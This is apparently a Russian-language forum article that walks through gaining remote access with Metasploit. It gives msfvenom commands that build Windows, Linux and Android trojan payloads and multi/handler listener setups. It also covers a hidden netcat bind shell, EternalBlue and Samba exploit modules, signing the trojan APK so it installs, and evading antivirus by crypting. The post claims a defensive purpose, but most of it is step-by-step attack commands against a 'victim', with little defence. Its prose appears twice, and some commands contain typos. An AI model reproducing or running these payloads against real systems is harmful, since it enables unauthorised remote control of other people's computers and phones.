Приветствую всех читателей форума! Сегодня я таки решился написать это, вопреки всем своим сомнениям и лени. А речь мы заведем о самых часто используемых эксплоитax для получения удаленного доступа. Каждый из них будет поочередно проанализирован и разобран для того, чтобы понять, как же защититься от этого.
После прочтения этих предложений ты, возможно понял, о чём будет идти речь в этой статье. Исходя из этого предоставляю список, через который каждый из эксплоитов пройдёт. Обзовем это этапами анализа. Встречайте!
Никакой дисклеймер и тому подобная чушь не избавит меня от мук совести, ведь какие-то моральные качества сохранить удалось. Статья написана мной из хороших побуждений. Это не инструкция, как хакнуть ПК друзей, не-е-е-т! Это сделано, чтобы от подобных действий каждый из читающих мог противостоять и защитить себя, свои персональные данные от действий неблагонадёжного контингента.
Первым подопытным станет широкоизвестный эксплоит под названием MultiHandler, который будет представлен с различными Payloadами. Достаточно хороший способ получить сессию на удалённом ПК, но всё же не идеально. Дальше поймёте почему.
Оборудование представленное в тексте:
1) О создании этого чудесного эксплоита, как на просторах русскоязычного гугла, так и на англоговорящих нет ни слова, но вряд-ли подобного рода listener создавался долгое время, скорее всего он является плодом обоюдной любви Rapid7 и его соратников, во время пересборки метасплоита. Впрочем, не суть.
2) В каких атаках был замешан этот совершенейший листенер? Как по мне, это не стоит того, чтобы углубляться в это, ведь каждая пятая удалённая сессия, успешно полученная злоумышленником, эксплуатируется с помощью этого чуда.
3) Практически все, от самых старых до Windows 10 последнего обновления без FireWalla, специально для написания этой статьи были проведены соответствующее исследования и тесты в этой области .
4) Подойдя вплотную к мануалу по использованию этого утопия, мы стыкаемся со следующим: на нем огромное количество полезных нагрузок, которые могут генерироваться и автономно доставляться на атакуемую тачку. Я продемонстрирую только три основных. К сожалению в этот список не войдёт http-payload на порт 443, только из-за острой нехватки времени.
Предельно просто, задаём пейлоад, тип файла и место сохранения,после того как мы перейдём в каталог root, мы увидим наш готовый файл. А продемонстрирую это всё дело с мобильного устройства с эмулятором. Для чего? Не знаю и сам, может ради того, чтобы продемонстрировать, что я могу получить доступ к ПК с телефона.
Запустим метасплоит и выполним следующее команды:
Установим интересующий нам пейлоад, естественно тот, который соответствует нашему
Установив порт и айпи жертвы, без зазрения совести запускаем слушатель, после чего открываем файл на атакуемом ПК и видим, что открылась сессия метерпретер. Всё работает по следующему принципу:
5) Какие же антивирусы препятствовали нам? Да практически все! Для начала все с них палили наш пейлоад, как троян, а для концовки - они не давали нам подключиться к жертве через листенер. Если не забуду, то скину ссылку или скрин с VT.
6) Защиту можно построить на базовых двух вещах: антивирусе и браундмаэре и на собственной голове. Но дальше я расскажу, как можно замаскировать это дело от антивирусов, тогда этот неподъёмный груз ложится только на вашу голову.
7) Выводы? Какие могут быть выводы если мы только на первом из трёх пейлоадов для слушателя? MultiHandler и Reverse_TCP. Выше я расписал о этом эксплоите, давайте к мануалу сразу! Как и в прошлый раз создаём пейлоад.ехе, но с некоторыми поправками.
Затем это всё добро доставляем жертве, после чего осталось только настроить слушатель. Это делается так же, но с небольшими правками.
После того, как жертва запустит наш пейлоад, мы словим сессию метерпретер. Суть заключается в том, что не мы подключаемся к нему, а он к нам, от сюда и название "Обратный".
Ну и скрытый шелл с помощью Netcat. Создаём исправленный пейлоад.exe:
После доставке жертве, злоумышленник обычно занят настройкой слушателя, как и мы всегда, но здесь мы и без него обойдёмся. Выручит нас netcat. Пишем:
После ловим сессию.
Выводы о MultiHandler: вещь неплохая, но не очень практичная, поскольку палится всем, чем только можно, при этом поддаётся криптованию, о чём расскажу ниже. Обычный антивирус и голова на плечах - в силах противостоять этому.
1) Об истории этого легендарного эксплоита можно говорить сутками напролёт, но всё-же ограничимся краткой историей. Википедия гласит: EternalBlue (CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года.
2) Был замешан в множестве атак, но самыми известными считают распространение WannaCry и Petya.
3) Windows 7, Windows server/R2 без патча CVE-2017 и при отсутствии антивируса, который будет срывать сессию.
4) Мануал, о да. О этом куча информации, поэтому не буду даже объяснять команды!
В итоге получил ошибку, видимо у меня уже установлен на это патч или закрыт смб порт.
5) Антивирусы, определённо, срывают коннект.
6) Регулярные обновления и наличия закрытых портов с антивирусом - вас защитит.
Решил слить два метода в один, ведь они касаются одной операционной системы и как использовать листенер - показано выше.
1) Оба эксплоита не имеют особой истории, оба достаточно древние, но в случае с пейлоад.ехе - непобедимый вариант.
2) Ко мне особые слухи об этих чудищах не успели дойти, но, думаю, в паре атак их использовали.
3) Получения удалённого доступа к тачке под линукс - их прямая и непосредственная задача.
4) Начнём с пейлоад.ехе, не буду показывать часть с настройкой слушателя, а просто создадим наш файлик.
Дальше идёт настройка слушателя и ловля с подсакой сессии, ну а мы переходим к самбе! Да, давайте забьём на всё и потанцуем самбу! Итак, протанцевав пол дня, я наконец осознал, что я должен написать о этом ужасном эксплоите со столь умилительным названием. Без лишних разъяснений приступаем.
После ловим сессию.
5) Исходя из того, что это... Линукс, пейлоад.ехе вирус тотал одобрил полностью, не обнаружив ни-че-го. Но подвержены эксплуатации более раннее версии, где не устранена уязвимость с самбой.
6) Единственной защитой, кроме головы, является установка более новых версий линукс.
Я понимаю, что подобного рода статья относится к тому, что было в начале статьи, но здесь есть свои подводные камни, которые мне удалось найти.
1) Насчёт создания и всего прочего - не известно, точнее в рунете нет ничего толкового.
2) Не фигурировал в каких-то крупных атаках.
3) Создаём всё такой же пейлоад, но с расширениям apk, ведь атакуемая тачка - андроид!
.
По традиции доставляем его на телефон жертвы и настраиваем слушатель:
После устанавливаем APK-шку на андроид, но видим следующее: "Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия метерпретер.
4) Самое забавное в этом всём, что подобное проникновение невозможно обнаружить антивирусом. Он абсолютно не имеет шансов против него. Суждение большей части людей: "Вирусы на андроид? Чё? Еретик!", - и тебя мгновенно жгут на костре фанаты андроида. Лучшая защита - ваша голова и осведомлённый мозг.
Для чего я низверг столько информации? Не нужно забывать, что лучшим антивирусом является светлая и осведомленная голова. Всё это написано для получения элементарных знаний, как работает это всё и как этому противостоять. В следующей части мы разберем как закриптовать и как обнаружить троян-пейлоад, как провести атаку через текстовые файлы или 7 чудес Metasploit ждут вас. До скорого, ребята.
После прочтения этих предложений ты, возможно понял, о чём будет идти речь в этой статье. Исходя из этого предоставляю список, через который каждый из эксплоитов пройдёт. Обзовем это этапами анализа. Встречайте!
- История происхождения и его разработка
- Где вы могли его видеть и где он был замешан?
- Подверженные атаке системы
- Краткий гайд по использованию
- Что препятствовало получению доступа?
- Отчёт с VirusTotal
- Как же такому противостоять?
- Недостатки
- Выводы
Никакой дисклеймер и тому подобная чушь не избавит меня от мук совести, ведь какие-то моральные качества сохранить удалось. Статья написана мной из хороших побуждений. Это не инструкция, как хакнуть ПК друзей, не-е-е-т! Это сделано, чтобы от подобных действий каждый из читающих мог противостоять и защитить себя, свои персональные данные от действий неблагонадёжного контингента.
Первым подопытным станет широкоизвестный эксплоит под названием MultiHandler, который будет представлен с различными Payloadами. Достаточно хороший способ получить сессию на удалённом ПК, но всё же не идеально. Дальше поймёте почему.
Оборудование представленное в тексте:
- Ноутбук с операционной системой Windows 7
- Виртуальная машина с OS Windows server
- вторая виртуальная машина с OS Win XP SP2
- стационарный ПК с установленным Kali Linux
- Мобильный телефон с эмулятором терминала
- Виртуальная машина с OS Linux mint 13
MultiHandler или неплохие Meterpreter трояны
1) О создании этого чудесного эксплоита, как на просторах русскоязычного гугла, так и на англоговорящих нет ни слова, но вряд-ли подобного рода listener создавался долгое время, скорее всего он является плодом обоюдной любви Rapid7 и его соратников, во время пересборки метасплоита. Впрочем, не суть.
2) В каких атаках был замешан этот совершенейший листенер? Как по мне, это не стоит того, чтобы углубляться в это, ведь каждая пятая удалённая сессия, успешно полученная злоумышленником, эксплуатируется с помощью этого чуда.
3) Практически все, от самых старых до Windows 10 последнего обновления без FireWalla, специально для написания этой статьи были проведены соответствующее исследования и тесты в этой области .
4) Подойдя вплотную к мануалу по использованию этого утопия, мы стыкаемся со следующим: на нем огромное количество полезных нагрузок, которые могут генерироваться и автономно доставляться на атакуемую тачку. Я продемонстрирую только три основных. К сожалению в этот список не войдёт http-payload на порт 443, только из-за острой нехватки времени.
- MultiHandler, msfvenom и bind_TSP или получения meterpreter сессии, когда вам уже известен IP жертвы
- LPORT - Порт, через который будет работать "слушатель"
-p- Payload или полезная нагрузка-f- cоставная задающая тип файла,забегу наперед ,но возможно указать даже APK
Код:
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/TCP_bind.exeПредельно просто, задаём пейлоад, тип файла и место сохранения,после того как мы перейдём в каталог root, мы увидим наш готовый файл. А продемонстрирую это всё дело с мобильного устройства с эмулятором. Для чего? Не знаю и сам, может ради того, чтобы продемонстрировать, что я могу получить доступ к ПК с телефона.
Запустим метасплоит и выполним следующее команды:
Код:
msfconsole
use exploit/multi/handlerУстановим интересующий нам пейлоад, естественно тот, который соответствует нашему
.exe:
Код:
set payload windows/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.43.211
runпейлоад.exe в данной ситуации выступает в роли клиента к которому мы проводим подключения с помощью нашего слушателя. Предельно простая схема.
5) Какие же антивирусы препятствовали нам? Да практически все! Для начала все с них палили наш пейлоад, как троян, а для концовки - они не давали нам подключиться к жертве через листенер. Если не забуду, то скину ссылку или скрин с VT.
6) Защиту можно построить на базовых двух вещах: антивирусе и браундмаэре и на собственной голове. Но дальше я расскажу, как можно замаскировать это дело от антивирусов, тогда этот неподъёмный груз ложится только на вашу голову.
7) Выводы? Какие могут быть выводы если мы только на первом из трёх пейлоадов для слушателя? MultiHandler и Reverse_TCP. Выше я расписал о этом эксплоите, давайте к мануалу сразу! Как и в прошлый раз создаём пейлоад.ехе, но с некоторыми поправками.
Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=5555 -f exe > / root/reverse_tcp.exeЗатем это всё добро доставляем жертве, после чего осталось только настроить слушатель. Это делается так же, но с небольшими правками.
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP 192.168.43.1
set lport 5555
exploitПосле того, как жертва запустит наш пейлоад, мы словим сессию метерпретер. Суть заключается в том, что не мы подключаемся к нему, а он к нам, от сюда и название "Обратный".
Ну и скрытый шелл с помощью Netcat. Создаём исправленный пейлоад.exe:
Код:
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.43.1 lport=1010 -f exe > /root/hidden.exeПосле доставке жертве, злоумышленник обычно занят настройкой слушателя, как и мы всегда, но здесь мы и без него обойдёмся. Выручит нас netcat. Пишем:
Код:
nc 192.168.43.211 1010После ловим сессию.
Выводы о MultiHandler: вещь неплохая, но не очень практичная, поскольку палится всем, чем только можно, при этом поддаётся криптованию, о чём расскажу ниже. Обычный антивирус и голова на плечах - в силах противостоять этому.
EnternalBlue или появления Petya и WannaCry
1) Об истории этого легендарного эксплоита можно говорить сутками напролёт, но всё-же ограничимся краткой историей. Википедия гласит: EternalBlue (CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года.
2) Был замешан в множестве атак, но самыми известными считают распространение WannaCry и Petya.
3) Windows 7, Windows server/R2 без патча CVE-2017 и при отсутствии антивируса, который будет срывать сессию.
4) Мануал, о да. О этом куча информации, поэтому не буду даже объяснять команды!
Код:
use exploit/windows/smb/ms17_010
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
set rhost 192.168.43.211В итоге получил ошибку, видимо у меня уже установлен на это патч или закрыт смб порт.
5) Антивирусы, определённо, срывают коннект.
6) Регулярные обновления и наличия закрытых портов с антивирусом - вас защитит.
Samba Exploit и Reverse для Linux
Решил слить два метода в один, ведь они касаются одной операционной системы и как использовать листенер - показано выше.
1) Оба эксплоита не имеют особой истории, оба достаточно древние, но в случае с пейлоад.ехе - непобедимый вариант.
2) Ко мне особые слухи об этих чудищах не успели дойти, но, думаю, в паре атак их использовали.
3) Получения удалённого доступа к тачке под линукс - их прямая и непосредственная задача.
4) Начнём с пейлоад.ехе, не буду показывать часть с настройкой слушателя, а просто создадим наш файлик.
Код:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -f elf > /root/shell
Код:
use exploit/linux/samba/lsa_transnames_heap
set payload linux/x86/shell_bind_tcp
set rhost 175.167.45.234
set rport 445
exploit5) Исходя из того, что это... Линукс, пейлоад.ехе вирус тотал одобрил полностью, не обнаружив ни-че-го. Но подвержены эксплуатации более раннее версии, где не устранена уязвимость с самбой.
6) Единственной защитой, кроме головы, является установка более новых версий линукс.
Троян на андроид, любой версии или msfvenom-trojan в деле
Я понимаю, что подобного рода статья относится к тому, что было в начале статьи, но здесь есть свои подводные камни, которые мне удалось найти.
1) Насчёт создания и всего прочего - не известно, точнее в рунете нет ничего толкового.
2) Не фигурировал в каких-то крупных атаках.
3) Создаём всё такой же пейлоад, но с расширениям apk, ведь атакуемая тачка - андроид!
Код:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.43.211 lport=8888 > /root/file.apkПо традиции доставляем его на телефон жертвы и настраиваем слушатель:
Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.211
set lport 8888
exploit4) Самое забавное в этом всём, что подобное проникновение невозможно обнаружить антивирусом. Он абсолютно не имеет шансов против него. Суждение большей части людей: "Вирусы на андроид? Чё? Еретик!", - и тебя мгновенно жгут на костре фанаты андроида. Лучшая защита - ваша голова и осведомлённый мозг.
Shellter! Криптор пейлоадов!
Да! Господа, поскольку большая часть антивирусов палит пейлоады, нужно закриптовать это всё дело, что затруднит обнаружение вирусных сигнатур. Давайте-ка закриптуем одно из наших чудес метасплоита? Нет... Это уж в продолжении этой статейки, которую смело можно номинировать на звание исследования. Только два антивируса из пятидесяти обнаружили криптованный файл-троян.
Для чего я низверг столько информации? Не нужно забывать, что лучшим антивирусом является светлая и осведомленная голова. Всё это написано для получения элементарных знаний, как работает это всё и как этому противостоять. В следующей части мы разберем как закриптовать и как обнаружить троян-пейлоад, как провести атаку через текстовые файлы или 7 чудес Metasploit ждут вас. До скорого, ребята.
